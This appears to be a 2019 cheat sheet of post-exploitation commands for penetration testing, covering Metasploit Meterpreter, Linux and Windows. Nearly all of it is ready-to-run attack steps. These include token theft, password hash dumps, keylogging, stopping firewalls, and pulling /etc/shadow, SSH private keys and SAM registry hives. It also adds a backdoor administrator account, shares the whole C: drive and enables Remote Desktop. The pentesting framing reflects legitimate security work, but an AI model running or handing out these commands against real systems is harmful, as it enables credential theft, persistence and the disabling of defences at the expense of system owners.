Title: Post Exploit Commands used and required in Penetration TestingAuthor: unknowndevice64
<h2>Information Gathering</h2>
getuid
getpid
getsprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets

<h2>Escalating Privs</h2>
ps then migrate
getsystem

Tokens (use incognito)
list_tokens -u
impersonate_token
steal_token [pid]
rev2self

Retrieve Passwords
hashdump
cachedump
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc

Session
enumdesktops
getdesktop
setdesktop
uictl disable keyboard

Keylog
keyscan_start
keyscan_dump
keyscan_stop
Nix Post Auth

Disable Firewall
/etc/init.d/iptables save
/etc/init.d/iptables stop
iptables-save > /root/firewall.rules
iptables-restore < /root/firewall.rules

Files to pull
/etc/passwd
/etc/shadow OR /etc/security/shadow (on AIX)
/etc/groups OR /etc/gshadow
/home/*/.ssh/id*
/etc/sudoers

User Information
grep ^ssh /home/*/.*hist*
grep ^telnet `/home/*/.*hist*
grep ^mysql /home/*/.*hist*

<h2>Windows Post Auth</h2>

Get current logged in user
@echo %USERNAME%

Add user
net user pentest password /add
net localgroup administrators pentest /add

Add share
net share nothing$=C:\ /grant:pentest,FULL /unlimited

Disable Firewall
netsh firewall set opmode disable

Auto Start Directories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
C:\Documents And Settings\All Users\Start Menu\Programs\StartUp\
C:\wmiOWS\Start Menu\Programs\StartUp\
C:\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\

Accounts and Policies
net localgroup administrators OR net localgroup administrators /domain
net group “Domain Admins” /domain
net accounts ## or net accounts /domain

Files to pull
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%WINDIR%\repair\sam OR system OR software OR security
reg save HKLM\Security security.hive
reg save HKLM\System system.hive
reg save HKLM\SAM sam.hive

Enable Remote Desktop
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


Submitted On: 2019-05-18 13:27:47